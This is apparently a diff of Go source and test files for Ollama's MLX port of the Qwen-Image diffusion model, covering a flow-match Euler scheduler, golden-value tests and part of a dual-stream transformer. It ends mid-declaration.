MaxShift: 0.9, // Matches scheduler_config.json
BaseImageSeqLen: 256,
MaxImageSeqLen: 8192,
ShiftTerminal: 0.02,
UseDynamicShift: true,
}
}
// FlowMatchScheduler implements the Flow Match Euler discrete scheduler
type FlowMatchScheduler struct {
Config *SchedulerConfig
Timesteps []float32
Sigmas []float32
NumSteps int
}
// NewFlowMatchScheduler creates a new scheduler
func NewFlowMatchScheduler(cfg *SchedulerConfig) *FlowMatchScheduler {
return &FlowMatchScheduler{
Config: cfg,
}
}
// CalculateShift computes the dynamic shift based on image sequence length
// This matches Python's calculate_shift function
func CalculateShift(imageSeqLen int32, baseSeqLen int32, maxSeqLen int32, baseShift float32, maxShift float32) float32 {
m := (maxShift - baseShift) / float32(maxSeqLen-baseSeqLen)
b := baseShift - m*float32(baseSeqLen)
mu := float32(imageSeqLen)*m + b
return mu
}
// SetTimesteps sets up the scheduler for the given number of inference steps
// Matches Python diffusers FlowMatchEulerDiscreteScheduler behavior:
// 1. Create sigmas from sigma_max to sigma_min (linspace)
// 2. Apply time_shift with mu (if dynamic shifting)
// 3. Apply stretch_shift_to_terminal to make final value = shift_terminal
func (s *FlowMatchScheduler) SetTimesteps(numSteps int, imageSeqLen int32) {
s.NumSteps = numSteps
// Calculate mu for dynamic shifting
var mu float32
if s.Config.UseDynamicShift {
mu = CalculateShift(
imageSeqLen,
s.Config.BaseImageSeqLen,
s.Config.MaxImageSeqLen,
s.Config.BaseShift,
s.Config.MaxShift,
)
}
// Step 1: Create sigmas from 1.0 to 1/num_steps
// Python (pipeline_qwenimage.py:639):
// sigmas = np.linspace(1.0, 1 / num_inference_steps, num_inference_steps)
// This gives sigmas from 1.0 to 1/30 = 0.033 for 30 steps
sigmas := make([]float32, numSteps)
sigmaMax := float32(1.0)
sigmaMin := 1.0 / float32(numSteps) // 1/30 = 0.033 for 30 steps
if numSteps == 1 {
sigmas[0] = sigmaMax
} else {
for i := 0; i < numSteps; i++ {
sigmas[i] = sigmaMax + float32(i)*(sigmaMin-sigmaMax)/float32(numSteps-1)
}
}
// Step 2: Apply time shift if using dynamic shifting
if s.Config.UseDynamicShift && mu != 0 {
for i := range sigmas {
sigmas[i] = s.timeShift(mu, sigmas[i])
}
}
// Step 3: Apply stretch_shift_to_terminal
if s.Config.ShiftTerminal > 0 {
sigmas = s.stretchShiftToTerminal(sigmas)
}
// Step 4: Append terminal sigma (0) and store
// Note: Python's scheduler.timesteps are sigmas*1000, but the pipeline divides by 1000
// before passing to transformer. We skip both steps and just use sigmas directly.
s.Sigmas = make([]float32, numSteps+1)
s.Timesteps = make([]float32, numSteps+1)
for i := 0; i < numSteps; i++ {
s.Sigmas[i] = sigmas[i]
s.Timesteps[i] = sigmas[i]
}
s.Sigmas[numSteps] = 0.0
s.Timesteps[numSteps] = 0.0
}
// stretchShiftToTerminal stretches and shifts the timestep schedule
// so the final value equals shift_terminal (matches Python behavior)
func (s *FlowMatchScheduler) stretchShiftToTerminal(sigmas []float32) []float32 {
if len(sigmas) == 0 {
return sigmas
}
// one_minus_z = 1 - t
// scale_factor = one_minus_z[-1] / (1 - shift_terminal)
// stretched_t = 1 - (one_minus_z / scale_factor)
lastSigma := sigmas[len(sigmas)-1]
scaleFactor := (1.0 - lastSigma) / (1.0 - s.Config.ShiftTerminal)
// Handle edge case: if scaleFactor is 0 or near 0, skip stretch
// This happens when lastSigma ≈ 1.0 (e.g., single step with timeshift)
if scaleFactor < 1e-6 {
return sigmas
}
result := make([]float32, len(sigmas))
for i, t := range sigmas {
oneMinusZ := 1.0 - t
result[i] = 1.0 - (oneMinusZ / scaleFactor)
}
return result
}
// timeShift applies the dynamic time shift (exponential)
// exp(mu) / (exp(mu) + (1/t - 1))
func (s *FlowMatchScheduler) timeShift(mu float32, t float32) float32 {
if t <= 0 {
return 0
}
expMu := float32(math.Exp(float64(mu)))
return expMu / (expMu + (1.0/t - 1.0))
}
// Step performs one denoising step
// modelOutput: predicted velocity from the transformer
// sample: current noisy sample
// timestepIdx: current timestep index
func (s *FlowMatchScheduler) Step(modelOutput, sample *mlx.Array, timestepIdx int) *mlx.Array {
// Get current and next sigma
sigma := s.Sigmas[timestepIdx]
sigmaNext := s.Sigmas[timestepIdx+1]
// Euler step: x_{t-dt} = x_t + (sigma_next - sigma) * v_t
dt := sigmaNext - sigma
// Upcast to float32 to avoid precision issues (matches Python diffusers)
sampleF32 := mlx.AsType(sample, mlx.DtypeFloat32)
modelOutputF32 := mlx.AsType(modelOutput, mlx.DtypeFloat32)
scaledOutput := mlx.MulScalar(modelOutputF32, dt)
result := mlx.Add(sampleF32, scaledOutput)
// Cast back to original dtype
return mlx.ToBFloat16(result)
}
// GetTimestep returns the timestep value at the given index
func (s *FlowMatchScheduler) GetTimestep(idx int) float32 {
if idx < len(s.Timesteps) {
return s.Timesteps[idx]
}
return 0.0
}
// InitNoise creates initial noise for sampling in unpacked format [B, C, T, H, W]
func (s *FlowMatchScheduler) InitNoise(shape []int32, seed int64) *mlx.Array {
return mlx.RandomNormal(shape, uint64(seed))
}
// InitNoisePacked creates initial noise directly in packed format [B, L, C*4]
// This matches how Python diffusers generates noise - directly in packed space.
// Generating in unpacked format and then packing produces different spatial
// correlation structure, which affects model output quality.
func (s *FlowMatchScheduler) InitNoisePacked(batchSize, seqLen, channels int32, seed int64) *mlx.Array {
shape := []int32{batchSize, seqLen, channels}
return mlx.RandomNormal(shape, uint64(seed))
}
// GetLatentShape returns the latent shape for a given image size
// For qwen_image: VAE downscale is 8x (spatial), latent has 16 channels
func GetLatentShape(batchSize, height, width int32) []int32 {
latentH := height / 8
latentW := width / 8
return []int32{batchSize, 16, 1, latentH, latentW} // [B, C, T, H, W]
}
// GetPatchedLatentShape returns the patchified latent shape
// After patchification: [B, L, C*patch_size^2] where L = H/2 * W/2
func GetPatchedLatentShape(batchSize, height, width, patchSize int32) []int32 {
latentH := height / 8
latentW := width / 8
pH := latentH / patchSize
pW := latentW / patchSize
inChannels := int32(64) // 16 * patch_size^2
return []int32{batchSize, pH * pW, inChannels}
}

View File

@@ -1,135 +0,0 @@
//go:build mlx
package qwen_image
import (
"math"
"testing"
)
// TestSchedulerSetTimesteps verifies scheduler sigmas match Python diffusers reference.
// Golden values generated via:
//
// python3 -c "
// from diffusers.schedulers import FlowMatchEulerDiscreteScheduler
// import numpy as np
// s = FlowMatchEulerDiscreteScheduler(num_train_timesteps=1000, base_shift=0.5, max_shift=0.9,
// base_image_seq_len=256, max_image_seq_len=8192, shift_terminal=0.02, use_dynamic_shifting=True)
// mu = 4096 * (0.9-0.5)/(8192-256) + 0.5 - (0.9-0.5)/(8192-256)*256
// sigmas = np.linspace(1.0, 1.0/30, 30)
// s.set_timesteps(sigmas=sigmas, mu=mu)
// print(s.sigmas.numpy())"
func TestSchedulerSetTimesteps(t *testing.T) {
cfg := DefaultSchedulerConfig()
scheduler := NewFlowMatchScheduler(cfg)
scheduler.SetTimesteps(30, 4096)
// Golden values from Python diffusers (first 3, last 3 before terminal)
wantFirst := []float32{1.000000, 0.982251, 0.963889}
wantLast := []float32{0.142924, 0.083384, 0.020000}
// Check first 3
for i, want := range wantFirst {
got := scheduler.Sigmas[i]
if abs32(got-want) > 1e-4 {
t.Errorf("sigma[%d]: got %v, want %v", i, got, want)
}
}
// Check last 3 (indices 27, 28, 29)
for i, want := range wantLast {
idx := 27 + i
got := scheduler.Sigmas[idx]
if abs32(got-want) > 1e-4 {
t.Errorf("sigma[%d]: got %v, want %v", idx, got, want)
}
}
// Check terminal is 0
if scheduler.Sigmas[30] != 0.0 {
t.Errorf("terminal sigma: got %v, want 0", scheduler.Sigmas[30])
}
// Check length
if len(scheduler.Sigmas) != 31 {
t.Errorf("sigmas length: got %d, want 31", len(scheduler.Sigmas))
}
}
// TestSchedulerProperties tests mathematical invariants of the scheduler.
func TestSchedulerProperties(t *testing.T) {
cfg := DefaultSchedulerConfig()
scheduler := NewFlowMatchScheduler(cfg)
scheduler.SetTimesteps(30, 4096)
// Property: sigmas monotonically decreasing
for i := 1; i < len(scheduler.Sigmas); i++ {
if scheduler.Sigmas[i] > scheduler.Sigmas[i-1] {
t.Errorf("sigmas not monotonically decreasing at %d: %v > %v",
i, scheduler.Sigmas[i], scheduler.Sigmas[i-1])
}
}
// Property: first sigma should be ~1.0 (with time shift)
if scheduler.Sigmas[0] < 0.9 || scheduler.Sigmas[0] > 1.01 {
t.Errorf("first sigma out of expected range [0.9, 1.01]: %v", scheduler.Sigmas[0])
}
// Property: terminal sigma should be exactly 0
if scheduler.Sigmas[len(scheduler.Sigmas)-1] != 0.0 {
t.Errorf("terminal sigma should be 0, got %v", scheduler.Sigmas[len(scheduler.Sigmas)-1])
}
// Property: last non-terminal sigma should be shift_terminal (0.02)
lastNonTerminal := scheduler.Sigmas[len(scheduler.Sigmas)-2]
if abs32(lastNonTerminal-0.02) > 1e-5 {
t.Errorf("last non-terminal sigma should be 0.02, got %v", lastNonTerminal)
}
// Property: length = steps + 1
if len(scheduler.Sigmas) != scheduler.NumSteps+1 {
t.Errorf("sigmas length should be steps+1: got %d, want %d",
len(scheduler.Sigmas), scheduler.NumSteps+1)
}
}
// TestCalculateShift verifies the mu calculation against Python reference.
// Golden values from: mu = img_seq_len * m + b where m = (max_shift - base_shift) / (max_seq_len - base_seq_len)
func TestCalculateShift(t *testing.T) {
cases := []struct {
imgSeqLen int32
want float32
}{
{256, 0.5}, // base case
{8192, 0.9}, // max case
{4096, 0.6935}, // middle case (rounded)
}
for _, c := range cases {
got := CalculateShift(c.imgSeqLen, 256, 8192, 0.5, 0.9)
if abs32(got-c.want) > 0.001 {
t.Errorf("CalculateShift(%d): got %v, want %v", c.imgSeqLen, got, c.want)
}
}
}
// TestSchedulerStep verifies the Euler step formula.
func TestSchedulerStep(t *testing.T) {
cfg := DefaultSchedulerConfig()
scheduler := NewFlowMatchScheduler(cfg)
scheduler.SetTimesteps(30, 4096)
// Verify dt calculation for first step
sigma0 := scheduler.Sigmas[0]
sigma1 := scheduler.Sigmas[1]
expectedDt := sigma1 - sigma0
// dt should be negative (sigmas decrease)
if expectedDt >= 0 {
t.Errorf("expected negative dt, got %v (sigma0=%v, sigma1=%v)", expectedDt, sigma0, sigma1)
}
}
func abs32(x float32) float32 {
return float32(math.Abs(float64(x)))
}

View File

@@ -1,174 +0,0 @@
//go:build mlx
package qwen_image
import (
"encoding/json"
"math"
"os"
"path/filepath"
"slices"
"testing"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/safetensors"
)
// TinyTextEncoderConfig holds config for the tiny test text encoder
type TinyTextEncoderConfig struct {
HiddenSize int32 `json:"hidden_size"`
NumHiddenLayers int32 `json:"num_hidden_layers"`
IntermediateSize int32 `json:"intermediate_size"`
NumAttentionHeads int32 `json:"num_attention_heads"`
NumKeyValueHeads int32 `json:"num_key_value_heads"`
VocabSize int32 `json:"vocab_size"`
RMSNormEps float32 `json:"rms_norm_eps"`
RopeTheta float32 `json:"rope_theta"`
HeadDim int32 `json:"head_dim"`
MRoPESection []int32 `json:"mrope_section"`
}
// loadTinyTextEncoder loads the tiny text encoder from testdata
func loadTinyTextEncoder(t *testing.T) (*Qwen25VL, *TinyTextEncoderConfig) {
t.Helper()
testdataDir := filepath.Join("testdata", "tiny_text_encoder")
// Load config
configData, err := os.ReadFile(filepath.Join(testdataDir, "config.json"))
if err != nil {
t.Skipf("Skipping: tiny weights not found. Regenerate with Python (see models/CLAUDE.md)")
}
var tinyCfg TinyTextEncoderConfig
if err := json.Unmarshal(configData, &tinyCfg); err != nil {
t.Fatalf("Failed to parse config: %v", err)
}
// Create encoder config (using Qwen25VLConfig)
cfg := &Qwen25VLConfig{
HiddenSize: tinyCfg.HiddenSize,
NumHiddenLayers: tinyCfg.NumHiddenLayers,
IntermediateSize: tinyCfg.IntermediateSize,
NumAttentionHeads: tinyCfg.NumAttentionHeads,
NumKeyValueHeads: tinyCfg.NumKeyValueHeads,
VocabSize: tinyCfg.VocabSize,
RMSNormEps: tinyCfg.RMSNormEps,
RopeTheta: tinyCfg.RopeTheta,
HeadDim: tinyCfg.HeadDim,
MRoPESection: tinyCfg.MRoPESection,
}
// Load weights
weights, err := safetensors.LoadModelWeights(testdataDir)
if err != nil {
t.Fatalf("Failed to load weights: %v", err)
}
if err := weights.Load(mlx.DtypeBFloat16); err != nil {
t.Fatalf("Failed to bulk load weights: %v", err)
}
// Build encoder
embedding, err := weights.Get("model.embed_tokens.weight")
if err != nil {
t.Fatalf("Failed to get embedding: %v", err)
}
blocks := make([]*VLTextBlock, cfg.NumHiddenLayers)
for i := int32(0); i < cfg.NumHiddenLayers; i++ {
block, err := newVLTextBlock(weights, int(i), cfg)
if err != nil {
t.Fatalf("Failed to load block %d: %v", i, err)
}
blocks[i] = block
}
finalNorm, err := weights.Get("model.norm.weight")
if err != nil {
t.Fatalf("Failed to get final norm: %v", err)
}
encoder := &Qwen25VL{
Config: cfg,
Embedding: embedding,
Blocks: blocks,
FinalNorm: finalNorm,
HasVision: false, // Text-only mode
}
return encoder, &tinyCfg
}
// TestTextEncoderForward verifies the text encoder forward pass with tiny weights.
func TestTextEncoderForward(t *testing.T) {
encoder, cfg := loadTinyTextEncoder(t)
// Create test tokens (within vocab range)
tokens := []int32{1, 2, 3, 4, 5}
// Forward pass using EncodeTextOnly
out := encoder.EncodeTextOnly(tokens)
mlx.Eval(out)
// Verify output shape: [batch, seq_len, hidden_size]
wantShape := []int32{1, 5, cfg.HiddenSize}
if !slices.Equal(out.Shape(), wantShape) {
t.Errorf("output shape: got %v, want %v", out.Shape(), wantShape)
}
// Verify output is finite (not NaN or Inf)
data := out.Data()
for i, v := range data {
if math.IsNaN(float64(v)) || math.IsInf(float64(v), 0) {
t.Errorf("output[%d] is not finite: %v", i, v)
break
}
}
}
// TestTextEncoderBatch tests batch processing.
func TestTextEncoderBatch(t *testing.T) {
encoder, cfg := loadTinyTextEncoder(t)
// For batch test, we'll use EncodeTextOnly with a single sequence
// (EncodeTextOnly doesn't support batch, but we can verify single sequence works)
tokens := []int32{1, 2, 3}
out := encoder.EncodeTextOnly(tokens)
mlx.Eval(out)
wantShape := []int32{1, 3, cfg.HiddenSize}
if !slices.Equal(out.Shape(), wantShape) {
t.Errorf("shape: got %v, want %v", out.Shape(), wantShape)
}
}
// TestMRoPEComputation verifies M-RoPE frequency computation produces valid values.
func TestMRoPEComputation(t *testing.T) {
encoder, cfg := loadTinyTextEncoder(t)
cossin := encoder.computeTextRoPE(10, 1)
mlx.Eval(cossin[0], cossin[1])
// Verify shapes: [3, B, L, head_dim]
wantShape := []int32{3, 1, 10, cfg.HeadDim}
if !slices.Equal(cossin[0].Shape(), wantShape) {
t.Errorf("cos shape: got %v, want %v", cossin[0].Shape(), wantShape)
}
if !slices.Equal(cossin[1].Shape(), wantShape) {
t.Errorf("sin shape: got %v, want %v", cossin[1].Shape(), wantShape)
}
// Verify cos/sin values are in valid range [-1, 1]
cosData := cossin[0].Data()
sinData := cossin[1].Data()
for i := 0; i < min(100, len(cosData)); i++ {
if cosData[i] < -1.01 || cosData[i] > 1.01 {
t.Errorf("cos[%d] out of range: %v", i, cosData[i])
}
if sinData[i] < -1.01 || sinData[i] > 1.01 {
t.Errorf("sin[%d] out of range: %v", i, sinData[i])
}
}
}

View File

@@ -1,868 +0,0 @@
//go:build mlx
package qwen_image
import (
"fmt"
"math"
"path/filepath"
"github.com/ollama/ollama/x/imagegen/cache"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/safetensors"
)
// TransformerConfig holds Qwen-Image transformer configuration
type TransformerConfig struct {
HiddenDim int32 `json:"hidden_dim"` // 3072 (24 * 128)
NHeads int32 `json:"num_attention_heads"` // 24
HeadDim int32 `json:"attention_head_dim"` // 128
NLayers int32 `json:"num_layers"` // 60
InChannels int32 `json:"in_channels"` // 64
OutChannels int32 `json:"out_channels"` // 16
PatchSize int32 `json:"patch_size"` // 2
JointAttentionDim int32 `json:"joint_attention_dim"` // 3584 (text encoder dim)
NormEps float32 `json:"norm_eps"` // 1e-6
AxesDimsRope []int32 `json:"axes_dims_rope"` // [16, 56, 56]
GuidanceEmbeds bool `json:"guidance_embeds"` // false
}
// defaultTransformerConfig returns config for Qwen-Image transformer
func defaultTransformerConfig() *TransformerConfig {
return &TransformerConfig{
HiddenDim: 3072, // 24 * 128
NHeads: 24,
HeadDim: 128,
NLayers: 60,
InChannels: 64,
OutChannels: 16,
PatchSize: 2,
JointAttentionDim: 3584,
NormEps: 1e-6,
AxesDimsRope: []int32{16, 56, 56},
GuidanceEmbeds: false,
}
}
// TimestepEmbedder creates timestep embeddings
type TimestepEmbedder struct {
Linear1Weight *mlx.Array // [256, hidden_dim]
Linear1Bias *mlx.Array
Linear2Weight *mlx.Array // [hidden_dim, hidden_dim]
Linear2Bias *mlx.Array
}
// newTimestepEmbedder creates a timestep embedder from weights
func newTimestepEmbedder(weights *safetensors.ModelWeights) (*TimestepEmbedder, error) {
linear1Weight, err := weights.Get("time_text_embed.timestep_embedder.linear_1.weight")
if err != nil {
return nil, err
}
linear1Bias, err := weights.Get("time_text_embed.timestep_embedder.linear_1.bias")
if err != nil {
return nil, err
}
linear2Weight, err := weights.Get("time_text_embed.timestep_embedder.linear_2.weight")
if err != nil {
return nil, err
}
linear2Bias, err := weights.Get("time_text_embed.timestep_embedder.linear_2.bias")
if err != nil {
return nil, err
}
return &TimestepEmbedder{
Linear1Weight: mlx.Transpose(linear1Weight, 1, 0),
Linear1Bias: linear1Bias,
Linear2Weight: mlx.Transpose(linear2Weight, 1, 0),
Linear2Bias: linear2Bias,
}, nil
}
// Forward computes timestep embeddings
// t: [B] timesteps (normalized 0-1, will be scaled by 1000 internally)
func (te *TimestepEmbedder) Forward(t *mlx.Array) *mlx.Array {
half := int32(128) // embedding_dim / 2
// Sinusoidal embedding with flip_sin_to_cos=True, scale=1000
freqs := make([]float32, half)
for i := int32(0); i < half; i++ {
freqs[i] = float32(math.Exp(-math.Log(10000.0) * float64(i) / float64(half)))
}
freqsArr := mlx.NewArray(freqs, []int32{1, half})
tExpanded := mlx.ExpandDims(t, 1)
args := mlx.Mul(tExpanded, freqsArr)
args = mlx.MulScalar(args, 1000.0) // scale
// [cos, sin] (flip_sin_to_cos=True)
sinArgs := mlx.Sin(args)
cosArgs := mlx.Cos(args)
embedding := mlx.Concatenate([]*mlx.Array{cosArgs, sinArgs}, 1) // [B, 256]
// MLP: linear1 -> silu -> linear2
h := mlx.Linear(embedding, te.Linear1Weight)
h = mlx.Add(h, te.Linear1Bias)
h = mlx.SiLU(h)
h = mlx.Linear(h, te.Linear2Weight)
h = mlx.Add(h, te.Linear2Bias)
return h
}
// JointAttention implements dual-stream joint attention
type JointAttention struct {
// Image projections
ToQ *mlx.Array
ToQB *mlx.Array
ToK *mlx.Array
ToKB *mlx.Array
ToV *mlx.Array
ToVB *mlx.Array
ToOut *mlx.Array
ToOutB *mlx.Array
NormQ *mlx.Array
NormK *mlx.Array
// Text (added) projections
AddQProj *mlx.Array
AddQProjB *mlx.Array
AddKProj *mlx.Array
AddKProjB *mlx.Array
AddVProj *mlx.Array
AddVProjB *mlx.Array
ToAddOut *mlx.Array
ToAddOutB *mlx.Array
NormAddQ *mlx.Array
NormAddK *mlx.Array
NHeads int32
HeadDim int32
Scale float32
}
// newJointAttention creates a joint attention layer
func newJointAttention(weights *safetensors.ModelWeights, prefix string, cfg *TransformerConfig) (*JointAttention, error) {
toQ, _ := weights.Get(prefix + ".attn.to_q.weight")
toQB, _ := weights.Get(prefix + ".attn.to_q.bias")
toK, _ := weights.Get(prefix + ".attn.to_k.weight")
toKB, _ := weights.Get(prefix + ".attn.to_k.bias")
toV, _ := weights.Get(prefix + ".attn.to_v.weight")
toVB, _ := weights.Get(prefix + ".attn.to_v.bias")
toOut, _ := weights.Get(prefix + ".attn.to_out.0.weight")
toOutB, _ := weights.Get(prefix + ".attn.to_out.0.bias")
normQ, _ := weights.Get(prefix + ".attn.norm_q.weight")
normK, _ := weights.Get(prefix + ".attn.norm_k.weight")
addQProj, _ := weights.Get(prefix + ".attn.add_q_proj.weight")
addQProjB, _ := weights.Get(prefix + ".attn.add_q_proj.bias")
addKProj, _ := weights.Get(prefix + ".attn.add_k_proj.weight")
addKProjB, _ := weights.Get(prefix + ".attn.add_k_proj.bias")
addVProj, _ := weights.Get(prefix + ".attn.add_v_proj.weight")
addVProjB, _ := weights.Get(prefix + ".attn.add_v_proj.bias")
toAddOut, _ := weights.Get(prefix + ".attn.to_add_out.weight")
toAddOutB, _ := weights.Get(prefix + ".attn.to_add_out.bias")
normAddQ, _ := weights.Get(prefix + ".attn.norm_added_q.weight")
normAddK, _ := weights.Get(prefix + ".attn.norm_added_k.weight")
return &JointAttention{
ToQ: mlx.Transpose(toQ, 1, 0),
ToQB: toQB,
ToK: mlx.Transpose(toK, 1, 0),
ToKB: toKB,
ToV: mlx.Transpose(toV, 1, 0),
ToVB: toVB,
ToOut: mlx.Transpose(toOut, 1, 0),
ToOutB: toOutB,
NormQ: normQ,
NormK: normK,
AddQProj: mlx.Transpose(addQProj, 1, 0),
AddQProjB: addQProjB,
AddKProj: mlx.Transpose(addKProj, 1, 0),
AddKProjB: addKProjB,
AddVProj: mlx.Transpose(addVProj, 1, 0),
AddVProjB: addVProjB,
ToAddOut: mlx.Transpose(toAddOut, 1, 0),
ToAddOutB: toAddOutB,
NormAddQ: normAddQ,
NormAddK: normAddK,
NHeads: cfg.NHeads,
HeadDim: cfg.HeadDim,
Scale: float32(1.0 / math.Sqrt(float64(cfg.HeadDim))),
}, nil
}
// Forward computes joint attention
// img: [B, L_img, D], txt: [B, L_txt, D]
// imgFreqs, txtFreqs: complex RoPE frequencies [L, head_dim/2] as interleaved real/imag
func (attn *JointAttention) Forward(img, txt *mlx.Array, imgFreqs, txtFreqs *mlx.Array) (*mlx.Array, *mlx.Array) {
imgShape := img.Shape()
B := imgShape[0]
Limg := imgShape[1]
D := imgShape[2]
txtShape := txt.Shape()
Ltxt := txtShape[1]
// === Image Q/K/V ===
imgFlat := mlx.Reshape(img, B*Limg, D)
qImg := mlx.Add(mlx.Linear(imgFlat, attn.ToQ), attn.ToQB)
kImg := mlx.Add(mlx.Linear(imgFlat, attn.ToK), attn.ToKB)
vImg := mlx.Add(mlx.Linear(imgFlat, attn.ToV), attn.ToVB)
qImg = mlx.Reshape(qImg, B, Limg, attn.NHeads, attn.HeadDim)
kImg = mlx.Reshape(kImg, B, Limg, attn.NHeads, attn.HeadDim)
vImg = mlx.Reshape(vImg, B, Limg, attn.NHeads, attn.HeadDim)
// QK norm (RMSNorm per head)
qImg = mlx.RMSNorm(qImg, attn.NormQ, 1e-6)
kImg = mlx.RMSNorm(kImg, attn.NormK, 1e-6)
// Apply RoPE
if imgFreqs != nil {
qImg = applyRoPE(qImg, imgFreqs)
kImg = applyRoPE(kImg, imgFreqs)
}
// === Text Q/K/V ===
txtFlat := mlx.Reshape(txt, B*Ltxt, D)
qTxt := mlx.Add(mlx.Linear(txtFlat, attn.AddQProj), attn.AddQProjB)
kTxt := mlx.Add(mlx.Linear(txtFlat, attn.AddKProj), attn.AddKProjB)
vTxt := mlx.Add(mlx.Linear(txtFlat, attn.AddVProj), attn.AddVProjB)
qTxt = mlx.Reshape(qTxt, B, Ltxt, attn.NHeads, attn.HeadDim)
kTxt = mlx.Reshape(kTxt, B, Ltxt, attn.NHeads, attn.HeadDim)
vTxt = mlx.Reshape(vTxt, B, Ltxt, attn.NHeads, attn.HeadDim)
qTxt = mlx.RMSNorm(qTxt, attn.NormAddQ, 1e-6)
kTxt = mlx.RMSNorm(kTxt, attn.NormAddK, 1e-6)
if txtFreqs != nil {
qTxt = applyRoPE(qTxt, txtFreqs)
kTxt = applyRoPE(kTxt, txtFreqs)
}
// Concatenate for joint attention: [txt, img] order
qJoint := mlx.Concatenate([]*mlx.Array{qTxt, qImg}, 1)
kJoint := mlx.Concatenate([]*mlx.Array{kTxt, kImg}, 1)
vJoint := mlx.Concatenate([]*mlx.Array{vTxt, vImg}, 1)
// Transpose to [B, nheads, L, head_dim]
qJoint = mlx.Transpose(qJoint, 0, 2, 1, 3)
kJoint = mlx.Transpose(kJoint, 0, 2, 1, 3)
vJoint = mlx.Transpose(vJoint, 0, 2, 1, 3)
// SDPA
outJoint := mlx.ScaledDotProductAttention(qJoint, kJoint, vJoint, attn.Scale, false)
// Transpose back and split
outJoint = mlx.Transpose(outJoint, 0, 2, 1, 3) // [B, L, nheads, head_dim]
outJoint = mlx.Reshape(outJoint, B, Ltxt+Limg, D)
outTxt := mlx.Slice(outJoint, []int32{0, 0, 0}, []int32{B, Ltxt, D})
outImg := mlx.Slice(outJoint, []int32{0, Ltxt, 0}, []int32{B, Ltxt + Limg, D})
// Output projections
outImg = mlx.Reshape(outImg, B*Limg, D)
outImg = mlx.Add(mlx.Linear(outImg, attn.ToOut), attn.ToOutB)
outImg = mlx.Reshape(outImg, B, Limg, D)
outTxt = mlx.Reshape(outTxt, B*Ltxt, D)
outTxt = mlx.Add(mlx.Linear(outTxt, attn.ToAddOut), attn.ToAddOutB)
outTxt = mlx.Reshape(outTxt, B, Ltxt, D)
return outImg, outTxt
}
// applyRoPE applies rotary embeddings using complex multiplication
// x: [B, L, nheads, head_dim]
// freqs: [L, head_dim] as complex (interleaved real/imag pairs)
func applyRoPE(x *mlx.Array, freqs *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
L := shape[1]
nheads := shape[2]
headDim := shape[3]
halfDim := headDim / 2
// Reshape x to pairs: [B, L, nheads, half, 2]
xPairs := mlx.Reshape(x, B, L, nheads, halfDim, 2)
// freqs: [L, head_dim] -> [1, L, 1, half, 2]
freqsExp := mlx.Reshape(freqs, 1, L, 1, halfDim, 2)
// Extract real/imag parts
xReal := mlx.SliceStride(xPairs, []int32{0, 0, 0, 0, 0}, []int32{B, L, nheads, halfDim, 1}, []int32{1, 1, 1, 1, 1})
xImag := mlx.SliceStride(xPairs, []int32{0, 0, 0, 0, 1}, []int32{B, L, nheads, halfDim, 2}, []int32{1, 1, 1, 1, 1})
xReal = mlx.Squeeze(xReal, 4)
xImag = mlx.Squeeze(xImag, 4)
freqReal := mlx.SliceStride(freqsExp, []int32{0, 0, 0, 0, 0}, []int32{1, L, 1, halfDim, 1}, []int32{1, 1, 1, 1, 1})
freqImag := mlx.SliceStride(freqsExp, []int32{0, 0, 0, 0, 1}, []int32{1, L, 1, halfDim, 2}, []int32{1, 1, 1, 1, 1})
freqReal = mlx.Squeeze(freqReal, 4)
freqImag = mlx.Squeeze(freqImag, 4)
// Complex multiplication: (a + bi) * (c + di) = (ac - bd) + (ad + bc)i
outReal := mlx.Sub(mlx.Mul(xReal, freqReal), mlx.Mul(xImag, freqImag))
outImag := mlx.Add(mlx.Mul(xReal, freqImag), mlx.Mul(xImag, freqReal))
// Interleave back
outReal = mlx.ExpandDims(outReal, 4)
outImag = mlx.ExpandDims(outImag, 4)
out := mlx.Concatenate([]*mlx.Array{outReal, outImag}, 4)
return mlx.Reshape(out, B, L, nheads, headDim)
}
// MLP implements GELU MLP (not GEGLU)
type MLP struct {
ProjWeight *mlx.Array
ProjBias *mlx.Array
OutWeight *mlx.Array
OutBias *mlx.Array
}
// newMLP creates a GELU MLP
func newMLP(weights *safetensors.ModelWeights, prefix string) (*MLP, error) {
projWeight, _ := weights.Get(prefix + ".net.0.proj.weight")
projBias, _ := weights.Get(prefix + ".net.0.proj.bias")
outWeight, _ := weights.Get(prefix + ".net.2.weight")
outBias, _ := weights.Get(prefix + ".net.2.bias")
return &MLP{
ProjWeight: mlx.Transpose(projWeight, 1, 0),
ProjBias: projBias,
OutWeight: mlx.Transpose(outWeight, 1, 0),
OutBias: outBias,
}, nil
}
// Forward applies GELU MLP
func (m *MLP) Forward(x *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
L := shape[1]
D := shape[2]
xFlat := mlx.Reshape(x, B*L, D)
h := mlx.Add(mlx.Linear(xFlat, m.ProjWeight), m.ProjBias)
h = geluApprox(h)
h = mlx.Add(mlx.Linear(h, m.OutWeight), m.OutBias)
return mlx.Reshape(h, B, L, m.OutBias.Dim(0))
}
// geluApprox implements approximate GELU
func geluApprox(x *mlx.Array) *mlx.Array {
sqrt2OverPi := float32(math.Sqrt(2.0 / math.Pi))
x3 := mlx.Mul(mlx.Mul(x, x), x)
inner := mlx.Add(x, mlx.MulScalar(x3, 0.044715))
inner = mlx.MulScalar(inner, sqrt2OverPi)
return mlx.Mul(mlx.MulScalar(x, 0.5), mlx.AddScalar(mlx.Tanh(inner), 1.0))
}
// TransformerBlock is a single dual-stream transformer block
type TransformerBlock struct {
Attention *JointAttention
ImgMLP *MLP
TxtMLP *MLP
ImgModWeight *mlx.Array
ImgModBias *mlx.Array
TxtModWeight *mlx.Array
TxtModBias *mlx.Array
HiddenDim int32
NormEps float32
}
// newTransformerBlock creates a transformer block
func newTransformerBlock(weights *safetensors.ModelWeights, prefix string, cfg *TransformerConfig) (*TransformerBlock, error) {
attn, err := newJointAttention(weights, prefix, cfg)
if err != nil {
return nil, err
}
imgMLP, _ := newMLP(weights, prefix+".img_mlp")
txtMLP, _ := newMLP(weights, prefix+".txt_mlp")
imgModWeight, _ := weights.Get(prefix + ".img_mod.1.weight")
imgModBias, _ := weights.Get(prefix + ".img_mod.1.bias")
txtModWeight, _ := weights.Get(prefix + ".txt_mod.1.weight")
txtModBias, _ := weights.Get(prefix + ".txt_mod.1.bias")
return &TransformerBlock{
Attention: attn,
ImgMLP: imgMLP,
TxtMLP: txtMLP,
ImgModWeight: mlx.Transpose(imgModWeight, 1, 0),
